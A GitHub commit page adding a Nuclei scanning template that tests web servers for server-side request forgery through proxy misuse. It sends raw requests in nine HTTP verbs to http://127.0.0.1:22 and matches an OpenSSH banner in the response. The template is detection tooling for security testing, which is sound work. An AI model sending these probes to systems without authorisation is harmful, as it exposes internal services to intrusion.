Merge pull request #7106 from projectdiscovery/ssrf-via-proxy

Create ssrf-via-proxy.yaml
patch-1
pussycat0x 2023-05-11 14:51:15 +05:30 committed by GitHub
commit 5ab6e7ec1b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 44 additions and 0 deletions

View File

@ -0,0 +1,44 @@
id: ssrf-via-proxy
info:
name: SSRF via Proxy Unsafe
author: geeknik,petergrifin
severity: unknown
reference:
- https://github.com/geeknik/the-nuclei-templates/blob/main/ssrf-by-proxy.yaml
- https://twitter.com/HusseiN98D/status/1649006265450782720
- https://twitter.com/ImoJOnDz/status/1649089777629827072
tags: ssrf,proxy,oast,fuzz
http:
- payloads:
verb:
- GET
- HEAD
- POST
- PUT
- DELETE
- CONNECT
- OPTIONS
- TRACE
- PATCH
raw:
- |+
{{verb}} http://127.0.0.1:22 HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
unsafe: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Protocol mismatch"
- "OpenSSH"
condition: and
- type: status
status:
- 200